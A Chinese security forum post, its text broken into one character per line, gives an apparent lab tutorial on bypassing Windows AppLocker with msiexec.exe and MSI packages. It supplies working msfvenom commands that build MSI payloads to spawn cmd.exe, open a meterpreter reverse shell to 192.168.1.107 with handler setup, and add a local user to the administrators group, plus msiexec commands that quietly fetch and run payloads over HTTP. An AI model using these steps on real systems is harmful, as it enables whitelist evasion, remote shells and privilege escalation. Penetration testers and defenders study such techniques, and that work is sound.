论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
云安全
[28069] 2020-01-17_使用msiexec.exe绕过应用程序白名单(多种方法)
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-19
云安全
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-01-17_使用msiexec.exe绕过应用程序白名单(多种方法)
使
用
m
s
i
e
x
e
c
.
e
x
e
绕
过
应
用
程
序
白
名
单
(
多
种
方
法
)
O
t
s
安
全
2
0
2
0
-
0
1
-
1
7
如
何
绕
过
A
p
p
l
o
c
k
e
r
策
略
。
在
本
文
中
,
我
们
使
用
W
i
n
d
o
w
s
a
p
p
l
o
c
k
e
r
P
o
l
i
c
y
阻
止
了
“
c
m
d
.
e
x
e
”
文
件
,
并
尝
试
绕
过
此
限
制
以
获
取
命
令
提
示
符
。
表
中
的
内
容
适
用
于
适
用
于
A
p
p
l
o
c
k
e
r
的
关
联
文
件
格
式
的
关
联
文
件
格
式
挑
战
挑
战
1
:
:
–
使
用
使
用
.
m
s
i
文
件
绕
过
文
件
绕
过
A
p
p
l
o
c
k
e
r
以
获
取
以
获
取
C
M
D
有
关
有
关
M
S
I
文
件
的
更
多
信
息
文
件
的
更
多
信
息
多
种
获
取
多
种
获
取
C
M
D
的
方
法
的
方
法
使
用
M
s
f
v
e
n
o
m
-
1
s
t
方
法
生
成
恶
意
的
.
m
s
i
文
件
使
用
M
s
f
v
e
n
o
m
-
2
n
d
方
法
生
成
恶
意
的
.
m
s
i
文
件
使
用
M
s
f
v
e
n
o
m
-
3
r
d
方
法
生
成
恶
意
的
.
m
s
i
文
件
挑
战
挑
战
2
:
:
–
使
本
地
用
户
成
为
管
理
组
成
员
使
本
地
用
户
成
为
管
理
组
成
员
使
用
M
s
f
v
e
n
o
m
-
4
t
h
方
法
生
成
恶
意
.
m
s
i
文
件
适
用
于
A
p
p
l
o
c
k
e
r
的
关
联
文
件
格
式
W
i
n
d
o
w
s
a
p
p
l
o
c
k
e
r
是
一
项
安
全
策
略
,
已
在
家
庭
W
i
n
d
o
w
s
7
和
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
r
2
中
引
入
,
作
为
一
种
限
制
不
必
要
程
序
使
用
的
方
法
。
管
理
员
可
以
以
此
方
式
限
制
以
下
程
序
的
执
行
:
这
完
全
取
决
于
系
统
管
理
员
要
为
程
序
限
制
或
执
行
设
置
a
p
p
l
o
c
k
e
r
策
略
的
程
序
或
脚
本
。
可
能
存
在
命
令
提
示
命
令
提
示
符
符
(
c
m
d
.
e
x
e
)
,
P
o
w
e
r
s
h
e
l
l
或
d
l
l
文
件
文
件
或
批
处
理
文
件
批
处
理
文
件
或
r
u
n
d
l
l
3
2
.
e
x
e
或
r
e
g
s
r
v
.
3
2
或
r
e
g
a
s
m
等
被
阻
止
的
情
况
。
挑
战
1
:
–
使
用
.
m
s
i
文
件
绕
过
A
p
p
l
o
c
k
e
r
以
获
取
C
M
D
假
设
您
处
于
类
似
的
情
况
,
上
述
所
有
应
用
程
序
均
被
阻
止
,
并
且
仅
允
许
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
文
件
(
即
.
m
s
i
扩
展
名
)
扩
展
名
)
运
行
而
没
有
任
何
限
制
。
那
么
,
您
将
如
何
使
用
那
么
,
您
将
如
何
使
用
M
S
I
文
件
绕
过
这
些
限
制
并
获
得
完
整
的
特
权
文
件
绕
过
这
些
限
制
并
获
得
完
整
的
特
权
S
h
e
l
l
?
?
有
关
有
关
M
S
I
文
件
的
更
多
信
息
文
件
的
更
多
信
息
在
微
星
微
星
的
名
字
来
自
于
程
序
中
,
原
题
M
i
c
r
o
s
o
f
t
安
装
程
序
安
装
程
序
。
从
那
时
起
,
名
称
已
更
改
为
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
。
M
S
I
文
件
扩
展
名
文
件
是
W
i
n
d
o
w
s
软
件
包
安
装
程
序
。
安
装
软
件
包
包
含
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
安
装
或
卸
载
应
用
程
序
所
需
的
所
有
信
息
。
每
个
安
装
包
都
包
含
一
个
.
m
s
i
文
件
文
件
,
该
文
件
文
件
包
含
一
个
安
装
数
据
库
,
一
个
摘
要
信
息
流
以
及
用
于
安
装
不
同
部
分
的
数
据
流
。
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
技
术
分
为
两
个
部
分
,
两
个
部
分
可
以
结
合
使
用
。
其
中
包
括
客
户
端
安
装
程
序
服
务
(
M
s
i
e
x
e
c
.
e
x
e
)
和
M
i
c
r
o
s
o
f
t
软
件
安
装
(
M
S
I
)
软
件
包
文
件
。
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
使
用
程
序
包
文
件
中
包
含
的
信
息
来
安
装
程
序
。
M
s
i
e
x
e
c
.
e
x
e
程
序
是
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
的
组
件
。
当
安
装
程
序
调
用
它
时
,
M
s
i
e
x
e
c
.
e
x
e
使
用
M
s
i
.
d
l
l
读
取
程
序
包
(
.
m
s
i
)
文
件
,
应
用
所
有
转
换
(
.
m
s
t
)
文
件
以
及
合
并
安
装
程
序
提
供
的
命
令
行
选
项
。
安
装
程
序
将
执
行
所
有
与
安
装
相
关
的
任
务
,
包
括
将
文
件
复
制
到
硬
盘
,
进
行
注
册
表
修
改
,
在
桌
面
上
创
建
快
捷
方
式
以
及
显
示
对
话
框
,
以
在
必
要
时
提
示
用
户
安
装
首
选
项
。
在
计
算
机
上
安
装
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
时
,
它
将
更
改
.
m
s
i
文
件
的
注
册
文
件
类
型
,
因
此
,
如
果
双
击
.
m
s
i
文
件
,
则
M
s
i
e
x
e
c
.
e
x
e
将
与
该
文
件
一
起
运
行
。
每
个
M
S
I
软
件
包
文
件
都
包
含
一
个
关
系
类
型
的
数
据
库
,
该
数
据
库
存
储
在
许
多
安
装
方
案
中
安
装
(
和
删
除
)
程
序
所
需
的
指
令
和
数
据
。
多
种
获
取
C
M
D
的
方
法
使
用
使
用
M
s
f
v
e
n
o
m
-
1
s
t
方
法
方
法
生
成
恶
意
生
成
恶
意
.
m
s
i
文
件
文
件
现
在
,
让
我
们
在
K
a
l
i
机
器
中
打
开
一
个
新
终
端
,
并
生
成
恶
意
的
M
S
I
软
件
包
文
件
c
m
d
.
m
s
i
,
以
利
用
W
i
n
d
o
w
s
/
e
x
e
c
负
载
通
过
它
获
取
命
令
提
示
符
,
如
下
所
示
:
1
2
m
s
f
v
e
n
o
m
-
p
w
i
n
d
o
w
s
/
e
x
e
c
C
M
D
=
c
m
d
.
e
x
e
-
f
m
s
i
>
c
m
d
.
m
s
i
p
y
t
h
o
n
-
m
S
i
m
p
l
e
H
T
T
P
S
e
r
v
e
r
8
0
现
在
,
在
W
i
n
d
o
w
s
计
算
机
中
传
输
c
m
d
.
m
s
i
文
件
,
以
管
理
员
身
份
获
取
命
令
提
示
符
S
h
e
l
l
。
在
这
里
,
我
们
使
用
P
y
t
h
o
n
H
T
T
P
服
务
器
在
网
络
中
共
享
文
件
。
将
.
m
s
i
文
件
下
载
到
本
地
计
算
机
上
(
W
i
n
d
o
w
s
c
m
d
.
e
x
e
被
a
d
m
i
n
阻
止
的
W
i
n
d
o
w
s
操
作
系
统
)
后
,
可
以
使
用
以
下
语
法
在
运
行
提
示
符
下
使
用
m
s
i
e
x
e
c
.
e
x
e
运
行
m
s
i
文
件
。
语
法
:
语
法
:
m
s
i
e
x
e
c
/
q
u
i
e
t
/
i
1
m
s
i
e
x
e
c
/
q
u
i
e
t
/
i
C
:
U
s
e
r
s
r
a
j
D
e
s
k
t
o
p
c
m
d
.
m
s
i
一
旦
您
在
运
行
提
示
符
下
单
击
上
述
命
令
,
您
将
获
得
命
令
提
示
符
。
使
用
使
用
M
s
f
v
e
n
o
m
-
2
n
d
方
法
方
法
生
成
恶
意
生
成
恶
意
.
m
s
i
文
件
文
件
注
意
:
注
意
:
即
使
您
在
另
一
个
扩
展
名
中
重
命
名
c
m
d
.
m
s
i
文
件
,
它
也
会
绕
过
规
则
。
重
复
上
述
操
作
,
以
生
成
具
有
与
m
s
f
v
e
n
o
m
相
同
的
有
效
负
载
并
命
名
为
c
m
d
.
p
n
g
的
M
S
I
文
件
。
由
于
我
的
卡
里
语
中
已
经
有
一
个
c
m
d
.
m
s
i
文
件
,
因
此
我
将
其
重
命
名
为
c
m
d
.
p
n
g
并
使
用
p
y
t
h
o
n
服
务
器
进
行
传
输
。
将
c
m
d
.
p
n
g
文
件
(
实
际
上
是
.
m
s
i
文
件
)
下
载
到
本
地
计
算
机
上
(
W
i
n
d
o
w
s
c
m
d
.
e
x
e
被
管
理
员
阻
止
的
W
i
n
d
o
w
s
操
作
系
统
)
后
,
可
以
使
用
以
下
语
法
通
过
m
s
i
e
x
e
c
运
行
.
m
s
i
文
件
。
e
x
e
在
运
行
提
示
中
。
语
法
:
语
法
:
m
s
i
e
x
e
c
/
q
/
i
1
m
s
i
e
x
e
c
/
q
/
i
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
7
/
c
m
d
.
p
n
g
一
旦
您
在
运
行
提
示
符
下
单
击
上
述
命
令
,
您
将
获
得
命
令
提
示
符
。
使
用
使
用
M
s
f
v
e
n
o
m
-
3
r
d
方
法
方
法
生
成
恶
意
生
成
恶
意
.
m
s
i
文
件
文
件
在
上
述
方
法
中
,
我
们
通
过
利
用
W
i
n
d
o
w
s
/
e
x
e
c
有
效
负
载
获
得
命
令
提
示
符
,
但
是
现
在
我
们
将
使
用
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
有
效
负
载
通
过
m
e
t
e
r
p
r
e
t
e
r
会
话
获
取
完
整
特
权
命
令
外
壳
。
1
m
s
f
v
e
n
o
m
-
p
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
l
h
o
s
t
=
1
9
2
.
1
6
8
.
1
.
1
0
7
l
p
o
r
t
=
1
2
3
4
–
f
m
s
i
>
s
h
e
l
l
.
m
s
i
现
在
,
再
次
在
W
i
n
d
o
w
s
计
算
机
中
传
输
s
h
e
l
l
.
m
s
i
文
件
,
以
管
理
员
身
份
获
取
命
令
提
示
符
S
h
e
l
l
并
启
动
启
动
m
u
l
t
i
/
h
a
n
d
l
e
r
。
在
这
里
,
我
们
使
用
P
y
t
h
o
n
H
T
T
P
服
务
器
在
网
络
中
共
享
文
件
。
将
s
h
e
l
l
.
m
s
i
文
件
下
载
到
本
地
计
算
机
上
(
W
i
n
d
o
w
s
c
m
d
.
e
x
e
被
a
d
m
i
n
阻
止
的
W
i
n
d
o
w
s
操
作
系
统
)
后
,
可
以
使
用
以
下
语
法
在
运
行
提
示
符
下
使
用
m
s
i
e
x
e
c
.
e
x
e
运
行
.
m
s
i
文
件
。
语
法
:
语
法
:
m
s
i
e
x
e
c
/
q
/
i
1
m
s
i
e
x
e
c
/
q
/
i
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
7
/
s
h
e
l
l
.
m
s
i
一
旦
您
在
运
行
提
示
符
下
单
击
上
述
命
令
,
您
将
使
用
此
漏
洞
通
过
m
e
t
e
r
p
r
e
t
e
r
会
话
获
取
命
令
提
示
符
。
1
2
3
4
5
6
m
s
f
>
u
s
e
e
x
p
l
o
i
t
/
m
u
l
t
i
/
h
a
n
d
l
e
r
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
p
a
y
l
o
a
d
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
t
c
p
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
l
h
o
s
t
1
9
2
.
1
6
8
.
1
.
1
0
7
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
s
e
t
l
p
o
r
t
1
2
3
4
m
s
f
e
x
p
l
o
i
t
(
h
a
n
d
l
e
r
)
>
e
x
p
l
o
i
t
m
e
t
e
r
p
r
e
t
e
r
>
s
h
e
l
l
挑
战
2
:
–
使
本
地
用
户
成
为
管
理
员
组
的
成
员
假
设
您
处
于
类
似
的
情
况
,
所
有
上
述
应
用
程
序
均
被
阻
止
,
并
且
仅
W
i
n
d
o
w
s
I
n
s
t
a
l
l
e
r
文
件
(
即
.
m
s
i
扩
展
名
)
被
允
许
扩
展
名
)
被
允
许
不
受
任
何
限
制
地
运
行
。
然
后
,
您
将
如
何
使
用
然
后
,
您
将
如
何
使
用
M
S
I
文
件
绕
过
这
些
限
制
,
以
使
文
件
绕
过
这
些
限
制
,
以
使
c
m
d
.
e
x
e
被
阻
止
的
被
阻
止
的
A
d
m
i
n
i
s
t
r
a
t
o
r
s
G
r
o
u
p
的
本
地
用
户
成
员
?
的
本
地
用
户
成
员
?
注
意
:
注
意
:
这
里
a
a
r
u
是
本
地
用
户
帐
户
,
它
不
是
非
管
理
用
户
帐
户
,
如
下
所
示
:
我
们
知
道
,
由
于
有
a
p
p
l
o
c
k
e
r
执
行
规
则
策
略
,
c
m
d
.
e
x
e
在
本
地
计
算
机
上
被
阻
止
,
因
此
我
们
无
法
使
用
命
令
提
示
符
在
管
理
员
组
中
添
加
a
a
r
u
。
使
用
使
用
M
s
f
v
e
n
o
m
-
4
t
h
方
法
生
成
恶
意
方
法
生
成
恶
意
.
m
s
i
文
件
文
件
使
用
w
i
n
d
o
w
s
/
e
x
e
c
有
效
负
载
生
成
一
个
M
S
I
程
序
包
,
作
为
a
d
m
i
n
.
m
s
i
,
该
M
S
I
程
序
包
向
目
标
计
算
机
发
送
命
令
,
该
命
令
指
示
为
用
户
“
a
a
r
u
”
添
加
本
地
管
理
员
特
权
。
1
m
s
f
v
e
n
o
m
-
p
w
i
n
d
o
w
s
/
e
x
e
c
C
M
D
=
'
n
e
t
l
o
c
a
l
g
r
o
u
p
a
d
m
i
n
i
s
t
r
a
t
o
r
s
a
a
r
u
/
a
d
d
'
-
f
m
s
i
>
a
d
m
i
n
.
m
s
i
现
在
,
在
W
i
n
d
o
w
s
计
算
机
中
传
输
a
d
m
i
n
.
m
s
i
文
件
,
将
a
a
r
u
添
加
到
管
理
员
组
中
。
在
这
里
,
我
们
使
用
P
y
t
h
o
n
H
T
T
P
服
务
器
在
网
络
中
共
享
文
件
。
将
a
d
m
i
n
.
m
s
i
文
件
下
载
到
本
地
计
算
机
(
W
i
n
d
o
w
s
操
作
系
统
,
其
中
c
m
d
.
e
x
e
被
a
d
m
i
n
阻
止
)
后
,
可
以
使
用
以
下
语
法
在
运
行
提
示
符
下
使
用
m
s
i
e
x
e
c
.
e
x
e
运
行
a
d
m
i
n
.
m
s
i
文
件
。
语
法
:
语
法
:
m
s
i
e
x
e
c
/
q
/
i
1
m
s
i
e
x
e
c
/
q
/
i
h
t
t
p
:
/
/
1
9
2
.
1
6
8
.
1
.
1
0
7
/
a
d
m
i
n
.
m
s
i
一
旦
您
在
运
行
提
示
符
下
单
击
上
述
命
令
,
就
可
以
确
保
a
a
r
u
用
户
已
成
为
管
理
员
帐
户
的
一
部
分
。
希
望
您
已
经
清
楚
了
,
如
何
使
用
.
m
s
i
文
件
来
破
坏
c
m
d
.
e
x
e
和
其
他
应
用
程
序
被
管
理
员
阻
止
的
操
作
系
统
。
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
浏览过的版块
渗透测试
发表
云安全